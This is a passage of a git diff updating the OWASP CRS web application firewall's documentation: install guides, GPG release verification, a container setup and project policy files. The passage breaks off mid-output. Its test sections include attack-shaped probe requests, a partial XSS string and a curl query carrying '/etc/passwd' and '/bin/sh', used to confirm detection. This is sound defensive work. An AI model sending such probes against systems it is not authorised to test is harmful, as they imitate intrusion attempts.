CRS 3.x is a major release incompatible with CRS 2.x. - The rule IDs have changed. The file id_renumbering/IdNumbering.csv - contains a list with old and new rule IDs. However, a key feature - of the release 3.x is the reduction of false positives in the - default installation and we recommend you start with a fresh - install from scratch. - Key parameter variables have changed their name and new features - have been introduced. Your former modsecurity_crs_10_setup.conf - file is thus no longer usable. - We recommend you to start with a fresh install from scratch. - -Installing on Apache --------------------- - 1. Install ModSecurity for Apache - 2. Ensure that ModSecurity is loading correctly by checking error.log - at start up for lines indicating ModSecurity is installed. An example - might appear as follows: - ```ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/) configured.``` - 3. The most common method of deploying ModSecurity we have seen is - to create a new folder underneath the Apache directory (typically - /usr/local/apache/, /etc/httpd/, or /etc/apache2). Often this folder - is called 'modsecurity.d'. Create this folder and cd into it. - 4. Download our release from https://coreruleset.org/installation/ - and unpack it into a new owasp-modsecurity-crs folder. - 5. Move the crs-setup.conf.example file to crs-setup.conf. - Please take the time to go through this file and customize the settings - for your local environment. Failure to do so may result in false - negatives and false positives. See the section entitled OWASP CRS - Configuration for more detail. - 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and - rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the - '.example' extension. This will allow you to add exclusions without updates - overwriting them in the future. - 7. Add the following line to your httpd.conf/apache2.conf (the following - assumes you've put CRS into modsecurity.d/owasp-modsecurity-crs). You - can alternatively place these in any config file included by Apache: - ``` - - Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf - Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf - - ``` - 8. Restart web server and ensure it starts without errors - 9. Make sure your web sites are still running fine. - 10. Proceed to the section "Testing the Installation" below. - -Installing on Nginx -------------------- - 1. Compile ModSecurity into Nginx - 2. Ensure that ModSecurity is loading correctly by checking error.log - at start up for lines indicating ModSecurity is installed. An example - might appear as follows: - ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` - 3. The most common method of deploying ModSecurity we have seen is - to create a new folder underneath the Nginx directory (typically - /usr/local/nginx/conf/). Often this folder - is called 'owasp-modsecurity-crs'. Create this folder and cd into it. - 4. Download our release from https://coreruleset.org/installation/ - and unpack it into a new owasp-modsecurity-crs folder. - 5. Move the crs-setup.conf.example file to crs-setup.conf. - Please take this time to go through this - file and customize the settings for your local environment. Failure to - do so may result in false negatives and false positives. See the - section entitled OWASP CRS Configuration for more detail. - 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and - rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the - '.example' extension. This will allow you to add exceptions without updates - overwriting them in the future. - 7. Nginx requires the configuration of a single ModSecurity - configuration file within the nginx.conf file using the - 'ModSecurityConfig' directive (when using ModSecurity 2.x). - Best practice is to set 'ModSecurityConfig' to a file from - which you will include your other ModSecurity configuration - files. In this example we will use: - ```ModSecurityConfig modsec_includes.conf;``` - 7. Within modsec_includes.conf create your includes to the - CRS folder similar to as follows (The modsecurity.conf file from the - ModSecurity installation is included in this example): - ``` - include modsecurity.conf - include owasp-modsecurity-crs/crs-setup.conf - include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf - include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf - include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf - include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf - include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf - include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf - include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf - include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf - include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf - include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf - include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf - include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf - include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf - include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf - include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf - include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf - include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf - include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf - include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - ``` - 8. Restart web server and ensure it starts without errors - 9. Make sure your web sites are still running fine. - 10. Proceed to the section "Testing the Installation" below. - -Installing on IIS ------------------ - The IIS installer comes with an optional version of CRS built in. - To upgrade or install this after the fact follow the following - steps. - 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" - 2. Download our release from https://coreruleset.org/installation/ - and unpack it into the current folder. - 3. Move the crs-setup.conf.example file to crs-setup.conf. - Please take this time to go through this - file and customize the settings for your local environment. Failure to - do so may result in false negatives and false positives. See the - section entitled OWASP CRS Configuration for more detail. - 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and - rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the - '.example' extension. This will allow you to add exceptions without updates - overwriting them in the future. - 5. Navigate back to the 'ModSecurity IIS' folder and modify the - 'modsecurity_iis' to include the following: - ``` - include owasp-modsecurity-crs/crs-setup.conf - include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf - include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf - include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf - include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf - include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf - include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf - include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf - include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf - include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf - include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf - include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf - include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf - include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf - include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf - include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf - include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf - include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf - include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - ``` - 6. Restart web server and ensure it starts without errors - 7. Make sure your web sites are still running fine. - 8. Proceed to the section "Testing the Installation" below. - -Testing the Installation -======================== - To test your installation you should be able to use any number - of attacks. A typical request which should trigger CRS would be - ```http://localhost/?param=">``` - Upon sending this request you should see events reported in the - error log (nginx apache) or the event viewer (IIS). - - If have not changed the defaults with regards to anomaly scoring, - blocking and sampling percentage, then this request should have - been blocked and access forbidden. Likewise if you have configured - ModSecurity debug logging and/or audit logging this event should - log to these locations as well. - -OWASP CRS Configuration -======================= - The crs-setup.conf file includes management rules - and directives that can control important CRS functions. - The crs-setup.conf file comes with extensive comments. - This section here brings only the essential parts. - - By default we do not include settings within the crs-setup.conf - that configure ModSecurity itself. Instead those configuration - settings are set during the installation of ModSecurity proper. - An example for such such a - configuration file is available via the ModSecurity project - (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). - Be aware the crs-setup.conf file DOES specify - configuration directives such as SecDefaultAction. The default - is the anomaly scoring mode with the appropriate - SecDefaultAction as defined in the crs-setup.conf. - Alternative configuration modes are supported and explained - in crs-setup.conf. - - The default anomaly/correlation mode establishes an incoming - anomaly score threshold of 5 and an outgoing anomaly score - threshold of 4. The default installation has been tuned to - reduce false positives in a way that will allow most requests - to pass in this default setup. - - However, testing the setup and tuning false positives - before going to production is vital. This is especially true - if you raise the paranoia level with is set to 1 by default. - Higher paranoia levels ranging from 2 to 4 include more - aggressive rules which will raise additional false positives - but also raise the security level of your service. - - If you are unsure about the performance impact of the CRS - or if you are unsure about the number of false positives, then - you may want to use the sampling percentage. This number, - which is set to 100 by default, controls the percentage - of requests which is funneled into the CRS. Fresh installs - on high traffic sites are advised to start with a low, or - very low number of percentages and raise the number - slowly up to 100. Be aware that any number below 100 allows - a random number of requests to bypass the ruleset completely. - - Update the TX policy settings for allowed Request Methods, File - Extensions, maximum numbers of arguments, etc to better reflect - your environment that is being protected. - - Make sure your GeoIP and Project Honeypot settings are specified - if you are using them. - The GeoIP database is no longer included with the CRS. Instead - you are advised to download it regularly. - - The use of Project Honeypot requires a - free API key. These require an account but can be obtained at - https://www.projecthoneypot.org/httpbl_configure.php. - - Be sure to check out the other settings present within the - crs-setup.conf file. There are many other options that have to - do with aspects of web application security that are beyond - this document but are well explained in crs-setup.conf. diff --git a/INSTALL.md b/INSTALL.md new file mode 100644 index 0000000000..19eb0ac9f4 --- /dev/null +++ b/INSTALL.md @@ -0,0 +1,185 @@ +# Installing CRS + +This guide aims to get a CRS installation up and running. This guide assumes that a compatible ModSecurity engine is already present and working. If unsure then refer to the [extended install](https://coreruleset.org/docs/deployment/extended_install/) page for full details. + +## Downloading the Rule Set + +The first step is to download the CRS itself. The CRS project strongly recommends using a [supported version](https://github.com/coreruleset/coreruleset/security/policy). + +Official CRS releases can be found at the following URL: https://github.com/coreruleset/coreruleset/releases. + +For *production* environments, it is recommended to use the latest release, which is v4.0.0. For *testing* the bleeding edge CRS version, nightly releases are also provided. + +### Verifying Releases + +{{% notice note %}} +Releases are signed using the CRS project's [GPG key](https://coreruleset.org/security.asc) (fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72). Releases can be verified using GPG/PGP compatible tooling. + +To retrieve the CRS project's public key from public key servers using `gpg`, execute: `gpg --keyserver pgp.mit.edu --recv 0x38EEACA1AB8A6E72` (this ID should be equal to the last sixteen hex characters in the fingerprint). + +It is also possible to use `gpg --fetch-key https://coreruleset.org/security.asc` to retrieve the key directly. +{{% /notice %}} + +The following steps assume that a \*nix operating system is being used. Installation is similar on Windows but likely involves using a zip file from the CRS [releases page](https://github.com/coreruleset/coreruleset/releases). + +To download the release file and the corresponding signature: + +```bash +wget https://github.com/coreruleset/coreruleset/archive/refs/tags/v4.0.0.tar.gz +wget https://github.com/coreruleset/coreruleset/releases/download/v4.0.0/coreruleset-4.0.0.tar.gz.asc +``` + +To verify the integrity of the release: + +```bash +gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz +gpg: Signature made Wed Jun 30 10:05:48 2021 -03 +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [unknown] +gpg: WARNING: This key is not certified with a trusted signature! +gpg: There is no indication that the signature belongs to the owner. +Primary key fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72 +``` + +If the signature was good then the verification succeeds. If a warning is displayed, like the above, it means the CRS project's public key is *known* but is not *trusted*. + +To trust the CRS project's public key: + +```bash +gpg --edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg> trust +Your decision: 5 (ultimate trust) +Are you sure: Yes +gpg> quit +``` + +The result when verifying a release will then look like so: + +```bash +gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz +gpg: Signature made Wed Jun 30 15:05:48 2021 CEST +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [ultimate] +``` + +## Installing the Rule Set + +### Extracting the Files + +Once the rule set has been downloaded and verified, extract the rule set files to a well known location on the server. This will typically be somewhere in the web server directory. + +The examples presented below demonstrate using Apache. For information on configuring Nginx or IIS see the [extended install](https://coreruleset.org/docs/deployment/extended_install/) page. + +Note that while it's common practice to make a new `modsecurity.d` folder, as outlined below, this isn't strictly necessary. The path scheme outlined is common on RHEL-based operating systems; the Apache path used may need to be adjusted to match the server's installation. + +```bash +mkdir /etc/crs4 +tar -xzvf v4.0.0.tar.gz --strip-components 1 -C /etc/crs4 +``` + +Now all the CRS files will be located below the `/etc/crs4` directory. + +### Setting Up the Main Configuration File + +After extracting the rule set files, the next step is to set up the main OWASP CRS configuration file. An example configuration file is provided as part of the release package, located in the main directory: `crs-setup.conf.example`. + +{{% notice note %}} +Other aspects of ModSecurity, particularly engine-specific parameters, are controlled by the ModSecurity "recommended" configuration rules, `modsecurity.conf-recommended`. This file comes packaged with ModSecurity itself. +{{% /notice %}} + +In many scenarios, the default example CRS configuration will be a good enough starting point. It is, however, a good idea to take the time to look through the example configuration file *before* deploying it to make sure it's right for a given environment. + +Once any settings have been changed within the example configuration file, as needed, it should be renamed to remove the .example portion, like so: + +```bash +cd /etc/crs4 +mv crs-setup.conf.example crs-setup.conf +``` + +### Include-ing the Rule Files + +The last step is to tell the web server where the rules are. This is achieved by `include`-ing the rule configuration files in the `httpd.conf` file. Again, this example demonstrates using Apache, but the process is similar on other systems (see the [extended install](https://coreruleset.org/docs/deployment/extended_install/) page for details). + +```bash +echo 'IncludeOptional /etc/crs4/crs-setup.conf' >> /etc/httpd/conf/httpd.conf +echo 'IncludeOptional /etc/crs4/plugins/*-config.conf' >> /etc/httpd/conf/httpd.conf +echo 'IncludeOptional /etc/crs4/plugins/*-before.conf' >> /etc/httpd/conf/httpd.conf +echo 'IncludeOptional /etc/crs4/rules/*.conf' >> /etc/httpd/conf/httpd.conf +echo 'IncludeOptional /etc/crs4/plugins/*-after.conf' >> /etc/httpd/conf/httpd.conf +``` + +Now that everything has been configured, it should be possible to restart and being using the OWASP CRS. The CRS rules typically require a bit of tuning with rule exclusions, depending on the site and web applications in question. For more information on tuning, see [false positives and tuning](https://coreruleset.org/docs/concepts/false_positives_tuning/). + +```bash +systemctl restart httpd.service +``` + +## Alternative: Using Containers + +Another quick option is to use the official CRS [pre-packaged containers](https://coreruleset.org/docs/development/useful_tools/#official-crs-maintained-docker-images). Docker, Podman, or any compatible container engine can be used. The official CRS images are published in the Docker Hub. The image most often deployed is `owasp/modsecurity-crs`: it already has everything needed to get up and running quickly. + +The CRS project pre-packages both Apache and Nginx web servers along with the appropriate corresponding ModSecurity engine. More engines, like [Coraza](https://coraza.io/), will be added at a later date. + +To protect a running web server, all that's required is to get the appropriate image and set its configuration variables to make the WAF receives requests and proxies them to your backend server. + +Below is an example `docker-compose` file that can be used to pull the container images. All that needs to be changed is the `BACKEND` variable so that the WAF points to the backend server in question: + +```docker-compose +services: + modsec2-apache: + container_name: modsec2-apache + image: owasp/modsecurity-crs:apache + environment: + SERVERNAME: modsec2-apache + BACKEND: http:// + PORT: "80" + MODSEC_RULE_ENGINE: DetectionOnly + BLOCKING_PARANOIA: 2 + TZ: "${TZ}" + ERRORLOG: "/var/log/error.log" + ACCESSLOG: "/var/log/access.log" + MODSEC_AUDIT_LOG_FORMAT: Native + MODSEC_AUDIT_LOG_TYPE: Serial + MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log" + MODSEC_TMP_DIR: "/tmp" + MODSEC_RESP_BODY_ACCESS: "On" + MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json" + COMBINED_FILE_SIZES: "65535" + volumes: + ports: + - "80:80" +``` + +That's all that needs to be done. Simply starting the container described above will instantly provide the protection of the latest stable CRS release in front of a given backend server or service. There are [lots of additional variables](https://github.com/coreruleset/modsecurity-crs-docker) that can be used to configure the container image and its behavior, so be sure to read the full documentation. + +## Verifying that the CRS is active + +Always verify that CRS is installed correctly by sending a 'malicious' request to your site or application, for instance: + +```bash +curl 'https://www.example.com/?foo=/etc/passwd&bar=/bin/sh' +``` + +Depending on your configurated thresholds, this should be detected as a malicious request. If you use blocking mode, you should receive an Error 403. The request should also be logged to the audit log, which is usually in `/var/log/modsec_audit.log`. + +## Upgrading + +### Upgrading from CRS 3.x to CRS 4 + +The most impactful change is the removal of application exclusion packages in favor of a plugin system. If you had activated the exclusion packages in CRS 3, you should download the plugins for them and place them in the plugins subdirectory. We maintain the list of plugins in our [Plugin Registry](https://github.com/coreruleset/plugin-registry). You can find detailed information on working with plugins in our [plugins documentation]()https://coreruleset.org/docs/concepts/plugins/. + +In terms of changes to the detection rules, the amount of changes is smaller than in the CRS 2—3 changeover. Most rules have only evolved slightly, so it is recommended that you keep any existing custom exclusions that you have made under CRS 3. + +We recommend to start over by copying our `crs-setup.conf.example` to `crs-setup.conf` with a copy of your old file at hand, and re-do the customizations that you had under CRS 3. + +Please note that we added a large number of new detections, and any new detection brings a certain risk of false alarms. Therefore, we recommend to test first before going live. + +### Upgrading from CRS 2.x to CRS 3 + +In general, you can update by unzipping our new release over your older one, and updating the `crs-setup.conf` file with any new settings. However, CRS 3.0 is a major rewrite, incompatible with CRS 2.x. Key setup variables have changed their name, and new features have been introduced. Your former modsecurity_crs_10_setup.conf file is thus no longer usable. We recommend you to start with a fresh crs-setup.conf file from scratch. + +Most rule IDs have been changed to reorganize them into logical sections. This means that if you have written custom configuration with exclusion rules (e.g. `SecRuleRemoveById`, `SecRuleRemoveTargetById`, `ctl:ruleRemoveById` or `ctl:ruleRemoveTargetById`) you must renumber the rule numbers in that configuration. You can do this using the supplied utility util/id_renumbering/update.py or find the changes in util/id_renumbering/IdNumbering.csv. + +However, a key feature of the CRS 3 is the reduction of false positives in the default installation, and many of your old exclusion rules may no longer be necessary. Therefore, it is a good option to start fresh without your old exclusion rules. + +If you are experienced in writing exclusion rules for CRS 2.x, it may be worthwhile to try running CRS 3 in Paranoia Level 2 (PL2). This is a stricter mode, which blocks additional attack patterns, but brings a higher number of false positives — in many situations the false positives will be comparable with CRS 2.x. This paranoia level however will bring you a higher protection level than CRS 2.x or a CRS 3 default install, so it can be worth the investment. diff --git a/KNOWN_BUGS b/KNOWN_BUGS.md similarity index 77% rename from KNOWN_BUGS rename to KNOWN_BUGS.md index d8083dcc2e..221d0f21eb 100644 --- a/KNOWN_BUGS +++ b/KNOWN_BUGS.md @@ -1,9 +1,10 @@ -== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS == +# CRS KNOWN BUGS -== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == -* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist + +* https://github.com/coreruleset/coreruleset/issues or the CRS Google Group at -* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project +* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project * There are still false positives for standard web applications in the default install (paranoia level 1). Please report these when @@ -26,7 +27,7 @@ or the CRS Google Group at We advise to upgrade your Apache version. If upgrading is not possible, we have provided a script in the util/join-multiline-rules directory which converts the rules into a format that works around the bug. - You have to re-run this script whenever you modify or update + You have to re-run this script whenever you modify or update the CRS rules. * Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity, which causes the following error in the Apache ErrorLog or SecAuditLog: @@ -38,13 +39,11 @@ or the CRS Google Group at type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is indicative that XML will be provided. In accordance with this, ModSecurity's XML Request Body Processor should also be configured to support this MIME type. Within - the ModSecurity project, commit 5e4e2af - (https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) + the ModSecurity project, [commit 5e4e2af](https://github.com/owasp-modsecurity/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) has been merged to support this endeavour. However, if you are running a modified or preexisting version of the modsecurity.conf provided by this repository, you may wish to upgrade rule '200000' accordingly. The rule now appears as follows: - -``` -SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ - "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" -``` + ``` + SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ + "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" + ``` diff --git a/LICENSE b/LICENSE index b671fe62ac..5dbb919094 100644 --- a/LICENSE +++ b/LICENSE @@ -186,7 +186,7 @@ same "printed page" as the copyright notice for easier identification within third-party archives. - Copyright 2006 the OWASP Core Rule Set contributors + Copyright 2024 OWASP CRS project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/README.md b/README.md index 44f93e8782..cc27e56a0e 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,33 @@ +![GHA build main](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=main)
+![GHA build v4.0/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v4.0%2Fdev) ![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) -![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev) -![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev) [![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) -# OWASP ModSecurity Core Rule Set (CRS) +# OWASP CRS -The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. +The OWASP CRS is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. ## CRS Resources -Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. +Please see the [OWASP CRS page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. ## Contributing to the CRS -We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. +We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false-positive alert reports, evasions, usability issues, and suggestions for new detections. -[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. +[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. We will try and address your issue and potentially ask for additional information to reproduce your problem. Please also note that stale issues will be flagged and closed after 120 days. You can search for stale issues with the following [search query](https://github.com/coreruleset/coreruleset/issues?q=label%3A%22Stale+issue%22). -[Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. +[Sign up for our Google Group](https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. -[Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS. +[Join the #coreruleset channel on OWASP Slack](https://owasp.slack.com/) to chat about the CRS. ([Click here](https://owasp.org/slack/invite) to get an invitation if you are not yet registered on the OWASP slack. It's open to non-members too.) ## License -Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+Copyright (c) 2021-2024 CRS project. All rights reserved. -The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. +The OWASP CRS is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. diff --git a/SECURITY.md b/SECURITY.md index 844d55a8bf..e09a0bd3a0 100644 --- a/SECURITY.md +++ b/SECURITY.md @@ -3,33 +3,88 @@ ## Supported Versions OWASP CRS has two types of releases, Major releases (3.0.0, 3.1.0, 3.2.0 etc.) and point releases (3.0.1, 3.0.2 etc.). -For more information see our [wiki](https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Release-Policy). -The OWASP CRS officially supports the two point releases with security patching preceding the current major release . +For more information see our [wiki](https://github.com/coreruleset/coreruleset/wiki/Release-Policy). + +The OWASP CRS officially supports the two latest point releases with severe security patches. We are happy to receive and merge PR's that address security issues in older versions of the project, but the team itself may choose not to fix these. Along those lines, OWASP CRS team may not issue security notifications for unsupported software. | Version | Supported | | --------- | ------------------ | -| 3.3.x-dev | :white_check_mark: | -| 3.2.x | :white_check_mark: | -| 3.1.x | :white_check_mark: | +| 4.0.0 | :white_check_mark: | +| 3.3.x | :white_check_mark: | +| 3.2.x | :x: | +| 3.1.x | :x: | | 3.0.x | :x: | +| 2.x | :x: | + +## GPG Signed Releases + +Releases are signed using [our GPG key](https://coreruleset.org/security.asc), (fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72). You can verify the release using GPG/PGP compatible tooling. + +### Importing the GPG Key + +To get our key using gpg: `gpg --keyserver pgp.mit.edu --recv 0x38EEACA1AB8A6E72` (this id should be equal to the last sixteen hex characters in our fingerprint). +You can also use `gpg --fetch-key https://coreruleset.org/security.asc` directly. + +### Verifying the CRS Release + +Download the release file and the corresponding signature. The following example shows how to do it for `v4.0.0` release: + +```bash +$ wget https://github.com/coreruleset/coreruleset/archive/refs/tags/v4.0.0.tar.gz +$ wget https://github.com/coreruleset/coreruleset/releases/download/v4.0.0/coreruleset-4.0.0.tar.gz.asc +``` + +**Verification**: + +```bash +❯ gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz +gpg: Signature made Wed Jun 30 10:05:48 2021 -03 +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [unknown] +gpg: WARNING: This key is not certified with a trusted signature! +gpg: There is no indication that the signature belongs to the owner. +Primary key fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72 +``` + +If the signature was good, the verification succeeded. If you see a warning like the above, it means you know our public key, but you are not trusting it. You can trust it by using the following method: + +```bash +gpg edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg> trust +Your decision: 5 (ultimate trust) +Are you sure: Yes +gpg> quit +``` + +Then you will see this result when verifying: +```bash +gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz +gpg: Signature made Wed Jun 30 15:05:48 2021 CEST +gpg: using RSA key 